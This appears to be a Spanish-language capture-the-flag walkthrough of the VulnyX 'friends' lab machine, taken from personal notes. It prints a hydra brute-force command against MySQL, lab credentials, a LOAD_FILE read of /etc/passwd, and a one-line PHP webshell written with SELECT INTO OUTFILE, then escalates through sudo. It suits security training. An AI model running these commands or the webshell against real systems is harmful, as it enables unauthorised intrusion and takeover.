Notas de Luis

Hacemos el escaneo de nmap:

Esto es lo que corre por el puerto 80:

Probamos en hacer fuzzing web y vemos un archivo index.php:

Debemos de hacer OSINT de esta imagen, donde tenemos una web que se llama yandex.com:

https://yandex.com/

Donde se puede subir una imagen y nos hace una investigación sobre ella, donde vemos los usuarios beavis y buthead:

Llegados a este punto podemos hacer un ataque de fuerza bruta contra la base de datos MySQL utilizando hydra:

hydra -t 64 -l beavis -P /usr/share/wordlists/rockyou.txt mysql://10.10.10.8

Una vez obtenida la contraseña, vamos a entrar en la base de datos y listamos las databases:

mysql -h 10.10.10.8 -u beavis -p
rocknroll

Y por aquí tenemos dos credenciales:

beavis:b3@v1$123
butthead:BuTTh3@D!

También dentro de la base de datos es posible leer archivos, por ejemplo el /etc/passwd:

SELECT LOAD_FILE("/etc/passwd");

Ahora si apuntamos contra el archivo index.php que veíamos al principio, podemos ver un comentario dentro de dicho archivo con una ruta:

Lo ponemos en el navegador y sale esto:

En este punto, probamos en cargar una webshell desde la base de datos:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/M3t4LL1c@/shell.php";

Y obtenemos ejecución remota de comandos:

Codificamos el código de la reverse shell:

Ejecutamos el payload y obtenemos la reverse shell:

Y al ejecutar el comando sudo -l vemos que podemos ejecutar batcat como el usuario beavis:

Seguimos las instrucciones de gtfobins y vemos que nos convertimos en el usuario beavis:

Siendo beavis no enumeramos nada más, pero sí podemos convertirnos en el usuario butthead reutilizando sus credenciales obtenidas de la base de datos:

butthead:BuTTh3@D!

Y si de forma autenticada ejecutamos el comando sudo -l como este usuario, vemos que como root podemos ejecutar su:

Y si ejecutamos el comando sudo -u root /usr/bin/su nos convertimos en root:

computing/hacking/ctf/vulnyx/maquina_friends.txt · Última modificación: por 127.0.0.1